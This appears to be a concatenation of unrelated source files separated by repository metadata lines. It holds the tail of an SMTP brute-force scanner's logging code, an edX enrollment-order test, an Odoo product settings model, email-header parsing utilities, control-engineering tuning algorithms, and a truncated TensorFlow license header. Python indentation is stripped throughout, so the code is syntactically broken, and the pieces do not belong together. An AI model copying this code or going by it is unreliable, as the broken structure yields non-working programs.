thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write is 1 and verbose_level is not 0:
data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'smtp_brute',
'DESCRIPTION': messages(language, "no_user_passwords"), 'TIME': now(), 'CATEGORY': "brute",
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(target))
| apache-2.0 | -7,298,699,669,627,891,000 | 43.343333 | 122 | 0.496655 | false |
arbrandes/edx-platform | lms/djangoapps/commerce/management/commands/tests/test_create_orders_for_old_enterprise_course_enrollmnet.py | 4 | 4541 | """
Test the create_orders_for_old_enterprise_course_enrollment management command
"""
import re
from io import StringIO
from unittest.mock import patch
from django.core.management import call_command
from django.test import TestCase, override_settings
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory
from openedx.core.djangoapps.credit.tests.test_api import TEST_ECOMMERCE_WORKER
from openedx.core.djangolib.testing.utils import skip_unless_lms
from openedx.features.enterprise_support.tests.factories import (
EnterpriseCourseEnrollmentFactory,
EnterpriseCustomerUserFactory
)
@skip_unless_lms
@override_settings(ECOMMERCE_SERVICE_WORKER_USERNAME=TEST_ECOMMERCE_WORKER)
class TestEnterpriseCourseEnrollmentCreateOldOrder(TestCase):
"""
Test create_orders_for_old_enterprise_course_enrollment management command.
"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
UserFactory(username=TEST_ECOMMERCE_WORKER)
cls._create_enterprise_course_enrollments(30)
@classmethod
def _create_enterprise_course_enrollments(cls, count):
"""
Creates `count` test enrollments plus 1 invalid and 1 Audit enrollment
"""
for _ in range(count):
user = UserFactory()
course_enrollment = CourseEnrollmentFactory(mode=CourseMode.VERIFIED, user=user)
course = course_enrollment.course
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
# creating audit enrollment
user = UserFactory()
course_enrollment = CourseEnrollmentFactory(mode=CourseMode.AUDIT, user=user)
course = course_enrollment.course
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
# creating invalid enrollment (with no CourseEnrollment)
user = UserFactory()
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
@patch('lms.djangoapps.commerce.management.commands.create_orders_for_old_enterprise_course_enrollment'
'.Command._create_manual_enrollment_orders')
def test_command(self, mock_create_manual_enrollment_orders):
"""
Test command with batch size
"""
mock_create_manual_enrollment_orders.return_value = (0, 0, 0, []) # not correct return value, just fixes unpack
out = StringIO()
call_command('create_orders_for_old_enterprise_course_enrollment', '--batch-size=10', stdout=out)
output = out.getvalue()
assert 'Total Enrollments count to process: 32' in output
# 30 + 1 + 1
assert re.search(r'\[Final Summary\] Enrollments Success: \d+, New: \d+, Failed: 0, Invalid: 1 , Non-Paid: 1',
output)
# There are total 32 enrollments so there would be 4 batches (i.e: [10, 10, 10, 2])
# as there are 2 enrollments in last batch and that 2 enrollments are not valid enrollment to process,
# so _create_manual_enrollment_orders will not be called for last batch.
assert mock_create_manual_enrollment_orders.call_count == 3
@patch('lms.djangoapps.commerce.management.commands.create_orders_for_old_enterprise_course_enrollment'
'.Command._create_manual_enrollment_orders')
def test_command_start_and_end_index(self, mock_create_manual_enrollment_orders):
"""
        Test command with start index, end index and batch size
"""
mock_create_manual_enrollment_orders.return_value = (0, 0, 0, []) # not correct return value, just fixes unpack
out = StringIO()
call_command(
'create_orders_for_old_enterprise_course_enrollment',
'--start-index=5',
'--end-index=20',
'--batch-size=10',
'--sleep-time=0.5',
stdout=out
)
output = out.getvalue()
assert 'Total Enrollments count to process: 15' in output
assert '[Final Summary] Enrollments Success: ' in output
assert mock_create_manual_enrollment_orders.call_count == 2
# batch of 2 (10, 5)
| agpl-3.0 | 7,827,564,943,324,703,000 | 45.336735 | 120 | 0.692138 | false |
Aravinthu/odoo | addons/product/models/res_config_settings.py | 11 | 2086 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
company_share_product = fields.Boolean(
'Share product to all companies',
help="Share your product to all companies defined in your instance.\n"
" * Checked : Product are visible for every company, even if a company is defined on the partner.\n"
" * Unchecked : Each company can see only its product (product where company is defined). Product not related to a company are visible for all companies.")
group_uom = fields.Boolean("Units of Measure", implied_group='product.group_uom')
group_product_variant = fields.Boolean("Attributes and Variants", implied_group='product.group_product_variant')
group_stock_packaging = fields.Boolean('Product Packages',
implied_group='product.group_stock_packaging')
group_sale_pricelist = fields.Boolean("Use pricelists to adapt your price per customers",
implied_group='product.group_sale_pricelist',
help="""Allows to manage different prices based on rules per category of customers.
Example: 10% for retailers, promotion of 5 EUR on this product, etc.""")
group_product_pricelist = fields.Boolean("Show pricelists On Products",
implied_group='product.group_product_pricelist')
group_pricelist_item = fields.Boolean("Show pricelists to customers",
implied_group='product.group_pricelist_item')
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
product_rule = self.env.ref('product.product_comp_rule')
res.update(
company_share_product=not bool(product_rule.active),
)
return res
def set_values(self):
super(ResConfigSettings, self).set_values()
product_rule = self.env.ref('product.product_comp_rule')
product_rule.write({'active': not bool(self.company_share_product)})
| agpl-3.0 | 9,105,499,386,824,484,000 | 49.878049 | 168 | 0.691275 | false |
radical-software/mongo-mail-web | mongo_mail_web/utils.py | 1 | 5870 | # -*- coding: utf-8 -*-
import operator
import base64
import zlib
import json
import re
import logging
from datetime import datetime
from email.utils import parseaddr
from IPy import IP
from dateutil import tz
from . import constants
logger = logging.getLogger(__name__)
reg_received = re.compile(r'^.*\[(?P<host_ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\].*')
def percent_calcul(current, before, fieldname):
"""
:current: dict
:before: dict
:fieldname: str
    Va: arrival value (current)
    Vd: departure value (before)
((Va-Vd)/Vd)*100
"""
va = current[fieldname]
vd = before[fieldname]
try:
#((Va-Vd)/Vd)*100
return (operator.truediv((va - vd), vd))*100
except:
return 0
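# Illustrative sketch of the relative-change formula above. The helper name,
# the dicts and the 'parsed' field are assumed values for demonstration only
# and are not used anywhere else in this module.
def _percent_calcul_example():
    before = {'parsed': 200}
    current = {'parsed': 250}
    # ((250 - 200) / 200) * 100 -> 25.0
    return percent_calcul(current, before, 'parsed')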
# TODO: see benchmark - time and storage: http://tukaani.org/lzma/benchmarks.html
def compress(data):
return base64.b64encode(zlib.compress(data))
def uncompress(data):
return zlib.decompress(base64.b64decode(data))
def check_ipv4(value):
try:
return IP(value).version() == 4
except:
return False
def check_ipv6(value):
try:
return IP(value).version() == 6
except:
return False
def is_public_address(address):
try:
return IP(address).iptype() == 'PUBLIC'
except:
return False
def timestamp():
dt = datetime.utcnow()
return datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, tz.tzutc())
def parse_received(receives,
exclude=['127.0.0.1', '::1']):
"""Récupération et parsing des champs Received"""
if not receives:
return []
objects = []
i=0
for receive in receives:
try:
r = receive.replace('\t', ' ').replace('\n', ' ').strip()
f = r[:4].lower()
if (f.find('by') < 0) and (f.find('from') < 0): continue
if (r.find('[') < 0) or (r.find(']') < 0): continue
#Baruwa:
#re.compile(r'(^Received:|X-Originating-IP:)')
            # Ours:
#re.compile(r'^.*\[(?P<host_ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\].*')
m = reg_received.match(r)
if not m:
logger.warning("process_received - regexp None : %s" % r )
continue
host_ip = m.group('host_ip')
if host_ip is None:
logger.warning("process_received - host_ip None : %s" % r )
continue
if host_ip in exclude:
continue
if not is_public_address(host_ip):
continue
try:
#date_receive_str = r.split(';')[1].strip()
#TOOD: Optimisations
#date_receive = normalize_datetime(email.utils.parsedate( date_receive_str ))
objects.append(host_ip)
"""
dict(host_ip=host_ip,
host_name=None, # TODO: StatMailReceived.host_name pas implémenté ???
date_receive=date_receive,
order_sort=i ))
"""
except Exception, err:
logger.warning("process_received - err1[%s] : %s" % (str(err), r))
i=i+1
except Exception, err:
logger.warning("process_received - err2[%s] : %s" % (str(err), r))
return objects
def get_quarantine_id(headers):
"""
X-Quarantine-ID: <k54m-OMYr-Jw>
parseaddr('<k54m-OMYr-Jw>')
('', 'k54m-OMYr-Jw')
"""
if constants.HEADER_QUARANTINE:
v = headers.get(constants.HEADER_QUARANTINE, '')
addr = parseaddr(v)
if addr and len(addr) == 2:
id = addr[1]
if id and len(id) > 0:
return id
def get_is_bounce(msg, sender=None):
"""
content_type = multipart/report
    Sender starting with prvs=
    BATV has nothing to do with bounces: it is used to generate a signature tag
    on outgoing mail for each recipient
[email protected]
http://en.wikipedia.org/wiki/Bounce_Address_Tag_Validation
BATV
http://babel.de/batv.html
"""
if not sender:
return True
if sender in ["", "<>"]:
return True
if msg.content_type.value.lower() in ['multipart/report', 'message/delivery-status']:
return True
if msg.content_type.is_multipart():
for part in msg.parts:
if part.content_type.value.lower() in ['multipart/report', 'message/delivery-status']:
return True
return False
def get_is_spam(headers):
"""Champs X-Spam-Flag"""
if constants.HEADER_IS_SPAM in headers:
v = headers.get(constants.HEADER_IS_SPAM, '')
if v.strip().upper() == 'YES':
return True
return False
def get_is_banned(headers):
"""Champs X-Amavis-Alert"""
if constants.HEADER_IS_BANNED in headers:
value = headers.get(constants.HEADER_IS_BANNED, '')
        # TODO: IMPORTANT retrieve the banned terms list
if constants.SEARCH_BANNED in value:
return True
return False
def get_is_virus(headers):
"""Champs X-Amavis-Alert"""
if constants.HEADER_IS_VIRUS in headers:
value = headers.get(constants.HEADER_IS_VIRUS, '')
if constants.SEARCH_VIRUS in value:
return True
return False
def get_is_unchecked(headers):
if constants.HEADER_IS_UNCHECKED in headers:
value = headers.get(constants.HEADER_IS_UNCHECKED, '')
if constants.SEARCH_UNCHECKED in value:
return True
return False
| bsd-3-clause | 2,407,284,289,076,300,300 | 24.814978 | 105 | 0.535154 | false |
AlCap23/Thesis | Python/Algorithms.py | 1 | 20278 | # coding: utf8
"""
Contains the Python package for Algorithm used
"""
# Import numpy
import numpy as np
# Step Information of SISO system
def Step_Info(y,t, p=0.02, yr = 1):
"""
Returns the Rise Time, Overshoot, Settling Time and Steady State
    of a given signal. Requires y, yr, t and optionally a percentage for the settling band
"""
# Check for Steady State
# Does series converge?
yss = y[-1]
# Get the rising time as the time
# First value above 0.1 steady state
index1 = np.where(y>0.1*yss)
# First value equal 0.9 steady state
index2 = np.where(y>0.9*yss)
# Rising Time
# Check if empty
if index1[0].size == 0:
t_rise = np.NaN
elif index2[0].size == 0:
t_rise = np.NaN
else:
        t_rise = t[index2[0][0]]-t[index1[0][0]]
# Overshoot for values above steady state
# Get all values
mp = np.abs(y[np.where(abs(y)>abs(yss))])
# Check if empty
if mp.size == 0:
mp = 0.
else:
mp = np.abs((np.max(mp)-np.abs(yss))/np.abs(yss))
    # Settling time: all values within a certain percentage band of the steady state
index = np.where(np.logical_and(abs(y)<(1+p)*abs(yss), abs(y)>(1-p)*abs(yss)))
# Ceck if empty
if index[0].size ==0:
t_settle = np.NaN
else:
t_settle = t[index[0][0]] -t[0]
return t_rise,mp,t_settle,yss
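# Illustrative usage sketch for Step_Info. The helper below and the synthetic
# first order response (gain 2, time constant 5 s, no delay) are assumed for
# demonstration only; nothing else in this module calls it.
def _step_info_example():
    t = np.linspace(0, 50, 5001)
    y = 2.0 * (1.0 - np.exp(-t / 5.0))
    # Returns rise time, overshoot, settling time and steady state value
    return Step_Info(y, t)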
def Disturbance_Info(y,t,p=0.02):
# Check for Steady State
# Does series converge to original value
yr = y[0]
if np.abs(y[-1]-yr) < 1e-2 :
yss = y[-1]
else:
yss = y[0]
# Maximum Overshoot for values above steady state
# Get all values
mp = np.abs(y-yss)
mp_max = np.argmax(mp)
if mp[mp_max] < 1e-5:
tp = 0.
else:
tp = t[mp_max]-t[0]
# Check if empty
if mp.size == 0:
mp = 0.
else:
mp = mp[mp_max]
    # Settling time: all values within a certain percentage band, after the overshoot
if abs(yss) < 1e-2:
index = np.where(np.logical_and(abs(y[mp_max:])<(+p), abs(y[mp_max:])>(-p)))
else:
index = np.where(np.logical_and(abs(y[mp_max:])<(1+p)*yss, abs(y[mp_max:])>(1-p)*yss))
    # Check if empty
if index[0].size ==0:
t_settle = 0.
elif mp < 1e-3 :
t_settle = 0.
else:
t_settle = t[index[0][0]] - t[0]
return tp,mp,t_settle,yss
# Integral Identification of first order time delay
def Integral_Identification(y,u,t):
"""Returns a FOTD Model from the given data.
y - array of outputs
u - array of inputs -> Maybe change to scalar!
t - array of time values
"""
# If the output is zero return emtpy function
if np.max(abs(y)) == 0:
return 0,0,0
    # Truncate where abs(y) has reached 98 % of its maximum value
#i_end = np.argmax(abs(y),axis=0)
i_end = np.argmax(abs(y)[np.where(abs(y)<=0.98*np.max(abs(y)))])
    # Ensure at least one sample is kept
if i_end <= 0:
i_end = 1
yp = y[0:i_end]
up = u[0:i_end]
tp = t[0:i_end]
# Get steady state Gain
KM = (y[np.argmax(abs(y),axis=0)]-y[0])/(u[-1])
# Get the Residence Time
Tar = 1/np.abs(up[-1])*np.sign(up[0])/KM * np.trapz(yp[-1]-yp,tp)
# Time Constant
T = 1/np.abs(up[-1])*np.sign(up[0])* np.exp(1)/KM*np.trapz(yp[np.where(tp<=Tar)],tp[np.where(tp<=Tar)])
# Delay
L = Tar-T
# Check if all arguments are valid
if (T < 0):
print("Error - Negative lag - Using 20 instead")
T = 20
if (L < 1e-2):
print("Error - Small delay - Using 0 instead")
if (L > 0):
L = 0
else:
L = 0
return KM,T,L
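# Illustrative usage sketch for the area-based FOTD identification. The unit
# step experiment below (true gain 2, lag 10 s, no delay) is assumed purely for
# demonstration; the estimates are approximate because the method truncates the
# response at 98 % of its maximum.
def _integral_identification_example():
    t = np.linspace(0, 100, 10001)
    u = np.ones_like(t)
    y = 2.0 * (1.0 - np.exp(-t / 10.0))
    km, tm, lm = Integral_Identification(y, u, t)
    return km, tm, lm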
# Algorithm for computing the gain of a first order time delay system
def FOTD_Gain(K,T,L,w=0):
"""Computes the gain of a first order time delay system at a given frequency"""
# Check if all dimensions match
if (K.shape != T.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
return np.NaN
# Steady State
if w==0:
return K
# System Dimension
if K.ndim == 1:
# Using system Identity by multiplying with the complex conjugate
G = 1/(T**2 * w**2 +1)*(K-1j*T*w)*(np.cos(-L*w)+1j*np.sin(-L*w))
else:
outputs,inputs = K.shape
# Create a system within the complex numbers
G = np.zeros_like(K, dtype=complex)
for i in range(0,inputs):
for o in range(0,outputs):
# Using system Identity by multiplying with the complex conjugate
G[o][i] = 1 /(T[o][i]**2 * w**2 +1) * ( K[o][i] - 1j*T[o][i]*w) *(np.cos(-L[o][i]*w)+1j*np.sin(-L[o][i]*w))
return G
# Algorithm for computing the RGA
def RGA(K,T,L,w=0):
"""Takes a FOTD System and computes the RGA of the system"""
if (K.shape != T.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
# Compute the System
G = FOTD_Gain(K,T,L,w)
# Calculate the RGA
RGA = np.multiply(G, np.transpose(np.linalg.inv(G)))
return RGA
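# Illustrative usage sketch for the RGA. The 2x2 FOTD parameters below are
# assumed demonstration values; at w=0 the RGA depends on the gain matrix only,
# and for this example the largest entry of each column lies on the diagonal,
# which suggests diagonal pairing.
def _rga_example():
    K = np.array([[2.0, 0.5], [0.4, 1.5]])
    T = np.array([[10.0, 8.0], [9.0, 12.0]])
    L = np.array([[2.0, 1.5], [1.8, 2.5]])
    return RGA(K, T, L, w=0)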
# Algorithm for AMIGO Tuning
def AMIGO_Tune(K,T,L, structure = 'PI', Minimal_Delay=0.3):
"""Computes the PI(D) controller parameter based on AMIGO algorithm;
Parameter are returned as parallel notation KP,KI,KD and set point;
Needs first order time delay parameter as input
"""
# Check for small delay
if L < Minimal_Delay*T:
if Minimal_Delay*T < 1e-2:
L_P = 1e-2
else:
L_P = Minimal_Delay*T
else:
L_P = L
# PI Controller
if structure == 'PI':
        # Parameters as defined in Aström et al., Advanced PID Control, p. 229
KP = 0.15/K + (0.35 - L_P*T /(L_P+T)**2)*T/(K*L_P)
TI = 0.35*L_P+(13*L_P*T**2)/(T**2+12*L_P*T+7*L_P**2)
TD = 0.0
# Set Point Weight, Derived from Fig. 7.2, p. 230
if L/(T+L) < 0.2:
b = 0.0
elif L/(T+L) > 0.3:
b = 1.0
else:
# Approximate as Linear Function
b = 0.0 + (1.0 - 0.0)/(0.3-0.2)*(L/(T+L)-0.2)
elif structure == 'PID':
KP = 1/K*(0.2+0.45*T/L_P)
TI = (0.4*L_P + 0.8*T)/(L_P+0.1*T)*L
TD = (0.5*L_P*T)/(0.3*L_P+T)
# Set Point Weight, as given on p.235
        # TO BE CHECKED!!!
if L/(T+L) > 0.5:
b = 1
else:
b = 0.0
else:
print("Undefined controller Structure")
return np.NaN
KI = KP/TI
KD = KP*TD
return [KP,KI,KD],b
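# Illustrative usage sketch for the AMIGO PI tuning. The FOTD parameters
# (gain 2, lag 10 s, delay 2 s) are assumed demonstration values; the call
# returns the parallel parameters [KP, KI, KD] and the set point weight b.
def _amigo_tune_example():
    params, b = AMIGO_Tune(2.0, 10.0, 2.0)
    kp, ki, kd = params
    return kp, ki, kd, b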
# Algorithm for AMIGO Detuning
def AMIGO_DETUNE(K,T,L,params,KP, MS = 1.4, structure = 'PI'):
"""Detunes the AMIGO parameter according to Astrom"""
# Check for small delay
if L < 1e-1:
L = 1e-1
# Calculate normalized Time
tau = L/(L+T)
# Needed Parameter
alpha_D = (MS-1)/MS # See p.255 Eq. 7.19
beta_D = MS*(MS+np.sqrt(MS**2-1))/2# See p.257 Eq. 7.24
# Define old set of parameter
KP0 = params[0]
KI0 = params[1]
KD0 = params[2]
if structure=='PI':
# Use normalized time to determine Process as explained on p.255 f.
if tau > 0.1:
KI = KI0*(K*KP+alpha_D)/(K*KP0+alpha_D)
else:
# Needed constrain for switch case,See p. 258 Eq. 7.27
c = KP*K - KP0*K*(L+T)/(beta_D*(alpha_D+KP*K)) - alpha_D
if c < 0:
KI = beta_D*(alpha_D+KP*K)**2/(K*(L+T))
else:
KI = KI0*(alpha_D+KP*K)/(alpha_D+KP0*K)
return [KP,KP/KI,0.0]
if structure == 'PID':
print("Not implemented")
return np.NaN
else:
print("Undefined controller Structure")
return np.NaN
# Algorithm for computing a decentralized controller based on RGA
def Control_Decentral(K,T,L, w = 0, b=np.empty, structure = 'PI', pairing = np.empty):
""" Computes decentralised controller with AMIGO algorithm based on RGA pairing"""
# Compute SISO Case
if K.ndim <= 1:
# Using system Identity by multiplying with the complex conjugate
params, b0 = AMIGO_Tune(K,T,L)
# If b is not given, use b from AMIGO
if b == np.empty:
B = b0
#Kr = [b0*params[0], params[1], params[2]]
Ky = params
else:
B = b
Ky = params
D = 1
# Compute general MIMO Case
else:
# Systems dimensions
outputs,inputs = K.shape
# Create an empty controller
Ky = np.zeros([outputs,inputs,3])
B = np.zeros([outputs,inputs])
D = np.eye(outputs,inputs)
# Compute RGA -> Checks for Shape
LG = RGA(K,T,L,w)
# Get Pairing as an array for every column
if pairing == np.empty:
Pairing = np.argmax(LG, axis=0)
else:
Pairing = pairing
# Iterate through the pairing
for o in range(0,outputs):
# Best Pairing
i = Pairing[o]
# Compute controller via recursion
Ky[o][i],B[o][i],d = Control_Decentral(K[o][i],T[o][i],L[o][i],b)
return Ky, B, D
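# Illustrative usage sketch for the decentralised design. The 2x2 FOTD model
# below reuses the assumed demonstration values from the RGA sketch; Ky holds
# one [KP, KI, KD] set per RGA-paired loop, B the set point weights and D the
# identity decoupler.
def _control_decentral_example():
    K = np.array([[2.0, 0.5], [0.4, 1.5]])
    T = np.array([[10.0, 8.0], [9.0, 12.0]])
    L = np.array([[2.0, 1.5], [1.8, 2.5]])
    Ky, B, D = Control_Decentral(K, T, L)
    return Ky, B, D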
# Algorithm for computing a decoupling control based on Aström
def Control_Astrom(K,T,L,H, MS= None, w = 0, b=np.empty, structure = 'PI'):
"""Computes a Decoupling Controller via Aström Algortihm based on FOTD"""
# Check Input for Maximum Sensitivity
if MS is None:
MS = 1.4*np.eye(K.shape[0],K.shape[1])
# Compute Determinant of Maximum Sensitivity
ms = np.linalg.det(MS)
# Compute SISO Case
if K.ndim <= 1:
return Control_Decentral(K,T,L,w,b,structure)
# Compute General MIMO Case
else:
# Systems dimensions
outputs,inputs = K.shape
# Check dimensions
if (K.shape != T.shape) or (K.shape != H.shape) or (K.shape != MS.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
return np.NaN
# Create an empty controller
Ky = np.empty([outputs,inputs,3])
B = np.empty([outputs,inputs])
# Compute the decoupler
D = np.linalg.inv(K)
        # Compute the interaction indices
# Since d/ds(Q*K) = d/ds(Q)*K = d/ds(G) we can write the Taylor coefficient
Gamma = np.abs(np.dot(np.multiply(-K,T+L),D))
#print(Gamma)
# Set main diagonal to zero
np.fill_diagonal(Gamma,0)
# Get the maximum of each row
GMax = np.argmax(Gamma,axis=1)
#print(GMax)
# Get the new System
Tt = np.dot(np.multiply(K,np.add(T,L)),D)-np.diag(np.max(L,axis=1))#np.dot(K,np.dot(np.transpose(np.add(T,L)),D))-np.diag(np.max(L,axis=1))
Lt = np.diag(np.max(np.transpose(L),axis=0))
Kt = np.eye(K.shape[0],K.shape[1])
# Iterate through the outputs
for o in range(0,outputs):
# Estimate the new system parameter
# Get the maximal delay
#l = np.max(L[o][:])
l = Lt[o][o]
# Add the systems gain -> scaled to 1 because of inversion
k = Kt[o][o]
# Get the array of gains
# Get the system time constant as weighted sum
t = Tt[o][o]
# Calculate the detuning frequency
R = 0.8
wc_min = 2.0/R * (t+l)/((t+l)**2 + t**2)
# Design a controller based on estimated system
ky, b0, d = Control_Decentral(k,t,l,w,b,structure)
# Test for Interaction
# We detune the controller of the n-th output in such a way that the maximum of the n-th row is sufficiently small
# Current maximum interaction
gmax = Gamma[GMax[o]][o]
# Check for set point weight, either given
if b == np.empty:
# Or computed from AMIGO_TUNE
b = b0
# Check for structure
if structure == 'PI':
# Set counter for while
counter=0
# Set shrinking rate
shrink_rate = 0.9
# Check if decoupling is needed
while (np.abs(H[o][o]/(ms*gmax)) - np.sqrt( (b*ky[0]*wc_min)**2 + ky[1]**2 ) < 0):
if counter > 5:
#print('Maximal Iteration for detuning reached! Abort')
break
# Detune the controller with the shrinking rate
ky = AMIGO_DETUNE(k,t,l,ky,shrink_rate*ky[0])
# Increment counter
counter += 1
print("Aström Detuning Iterations:" +str(counter))
# Get the controller parameter
Ky[o][o][:] = ky
B[o][o] = b
# Get the Minor diagonals
return Ky,B,D
# Modified Detuning
def Control_Decoupled(K,T,L,H, MS= None, w = 0, b=np.empty, structure = 'PI', method ='dynamic', pairing = np.empty):
# Check Input for Maximum Sensitivity
if MS is None:
MS = 1.4*np.eye(K.shape[0],K.shape[1])
# Compute Determinant of Maximum Sensitivity
ms = np.linalg.det(MS)
# Compute SISO Case
if K.ndim <= 1:
return Control_Decentral(K,T,L,w,b,structure)
# Compute General MIMO Case
else:
# Compute a decentralized control structure based on RGA
Ky, B, D = Control_Decentral(K,T,L, w , b, structure, pairing = pairing)
# Calculate the Pairing
if pairing == np.empty:
# Compute RGA -> Checks for Shape
LG = RGA(K,T,L,w)
Pairing = np.argmax(LG, axis=0)
else:
Pairing = pairing
# Compute the Taylor Series
Gamma = np.multiply(-K,T+L)
# Initialize
# Gain
KD = np.zeros_like(Gamma)
# Interaction
GD = np.zeros_like(Gamma)
# Get the Diagonal entries for decoupling
for outputs in range(0,K.shape[0]):
inputs = Pairing[outputs]
KD[outputs][inputs] = K[outputs][inputs]
GD[outputs][inputs] = Gamma[outputs][inputs]
# Get the Antidiagonal
# Gain
KA = K-KD
# Interaction
GA = Gamma-GD
# Define the splitter
S = -np.dot(np.linalg.inv(KD),KA)
# Get the interaction relative to the gain
if method == 'dynamic':
# Interaction relative to the dynamic of the interaction
GammaA = np.abs(np.dot(np.linalg.inv(GD),GA) + S)
elif method == 'static':
# Interaction relative to the gain
GammaA = np.abs(np.dot(np.linalg.inv(KD),np.add(GA,np.dot(GD,S))))
else:
# Interaction relative to the dynamic of the interaction
GammaA = np.abs(np.dot(np.linalg.inv(GD),GA) + S)
#print(GammaA)
# Get the maximum of each row
GMax = np.argmax(GammaA,axis=1)
#print(GMax)
#Iterate through the outputs
for outputs in range(0,K.shape[0]):
inputs = Pairing[outputs]
# Test the current controller for interaction
# Every controller has the dimension 3 for kp, ki, kd
ky = Ky[outputs][inputs]
#kr = Kr[outputs][inputs]
# Get the current parameter
k = K[outputs][inputs]
t = T[outputs][inputs]
l = L[outputs][inputs]
# Calculate the detuning frequency
R = 0.8
wc_min = 2.0/R * (t+l)/((t+l)**2 + t**2)
# Check for set point weight, either given
if b == np.empty:
# Or computed from AMIGO_TUNE
b = B[outputs][inputs]
gmax = GammaA[GMax[outputs]][outputs]
#print(gmax)
# Check for PI Structure
if structure == 'PI':
# Define the counter
counter = 0
# Set shrinking rate
shrink_rate = 0.9
while (np.abs(H[outputs][outputs]/(ms*gmax)) - np.sqrt( (b*ky[0]/wc_min)**2 + ky[1]**2 ) < 0):
if counter > 5:
#print('Maximal Iteration for detuning reached! Abort')
break
# Detune the controller with the shrinking rate
ky = AMIGO_DETUNE(k,t,l,ky,shrink_rate*ky[0])
# Increment counter
counter += 1
print("Modified Detuning Iterationts "+str(counter))
# Get the controller parameter
Ky[outputs][inputs][:] = ky
#Kr[outputs][inputs][:] = [b*ky[0], ky[1], ky[2]]
# Return the controller with splitter
return Ky,B,np.eye(K.shape[0],K.shape[1])+S
################################# MIMO FUNCTIONS FOR SIMULATION############################
def tf_system(ss, omega):
# Get the matrices
A = ss['A']
B = ss['B']
C = ss['C']
D = ss['D']
# Make a I matrix ( depends on the states)
I = np.eye(A.shape[0])
# The Transfer Function
G = np.dot(np.dot(C,np.linalg.inv(omega*1j*I-A)),B)+D
return G
# Compute a controller for a given KY, B, D
def compute_pi(KY, B, D):
# Make KPR,KPY, KIR and KIY
KPR = np.zeros((2,2))
KPY = np.zeros((2,2))
KIR = np.zeros((2,2))
KIY = np.zeros((2,2))
# Fill with values
for outputs in range(0,2):
for inputs in range(0,2):
# Proportional Controller
KPY[outputs,inputs] = KY[outputs,inputs,0]
            # Integral Controller
KIY[outputs,inputs] = KY[outputs,inputs,1]
# Implement Set-point Weight
KPR = np.dot(B,KPY)
KIR = KIY
# Implement Decoupler
KPR = np.dot(D,KPR)
KIR = np.dot(D,KIR)
KPY = np.dot(D,KPY)
KIY = np.dot(D,KIY)
return KPR, KIR, KPY, KIY
# Compute the sensitivity function of a closed loop
# Takes system, controller and frequency
def compute_sensitivity(ss,KY,B,D,omega):
# Compute the transfer function matrix
G = tf_system(ss, omega)
# Compute the controller
KPR, KIR, KPY, KIY = compute_pi(KY,B,D)
# Compute the sensitivity
S = np.linalg.inv(np.eye(2,2)+np.dot(G,np.add(KPY,1/(omega*1j)*KIY)))
return S
# Compute complementary sensitivity of a closed loop
# Takes system, controller and frequency
def compute_complementarysensitivity(ss, KY, B, D, omega):
# Compute the transfer function matrix
G = tf_system(ss, omega)
# Compute the controller
KPR, KIR, KPY, KIY = compute_pi(KY,B,D)
    # Compute the sensitivity
S = compute_sensitivity(ss, KY, B, D, omega)
# Compute the complementary sensitivity
T = np.dot(S,np.dot(G, np.add(KPR,1/(omega*1j)*KIR) ))
return T
#TUBScolorscale = [
# '#ffc82a','#ffd355','#ffde7f','#ffe9aa','#fff4d4',
# '#e16d00','#e78a33','#eda766','#f3c599','#f9e2cc',
# '#711c2f','#8d4959','#aa7782','#c6a4ac','#e3d2d5',
# '#acc13a', '#bdcd61','#cdda89','#dee6b0','#eef3d8','#6d8300','#8a9c33','#a7b566','#c5cd99','#e2e6cc','#00534a','#33756e','#669892','#99bab7','#ccdddb',
# '#66b4d3','#85c3dc','#a3d2e5','#c2e1ed','#e0f0f6','#00709b','#338daf','#66a9c3','#99c6d7','#cce2eb','#003f57','#336579','#668c9a','#99b2bc','#ccd9dd',
# '#8a307f','#a15999','#b983b2','#d0accc','#e8d6e5','#511246','#74416b','#977190','#b9a0b5','#dcd0da','#4c1830','#704659','#947483','#b7a3ac','#dbd1d6'
#]
# Only Main Colors
# Black, Red, Yellow, Orange, Dark Red, Light Green, Green, Dark Green, Light Blue, Blue, Dark Blue, Light Violet, Violet, Dark Violet
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
TUBScolorscale = [
'#000000','#be1e3c','#ffc82a', '#e16d00', '#711c2f', '#acc13a', '#6d8300', '#00534a',
'#66b4d3','#00709b','#003f57','#8a307f','#511246','#4c1830', '#FF00FF'
]
def cm2in(*tupl):
"""Stack overflow-> User gns-ank"""
inch = 2.54
if isinstance(tupl[0], tuple):
return tuple(i/inch for i in tupl[0])
else:
return tuple(i/inch for i in tupl) | gpl-3.0 | 744,544,014,905,445,900 | 32.236066 | 156 | 0.535836 | false |
awni/tensorflow | tensorflow/tensorboard/backend/server.py | 4 | 5850 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
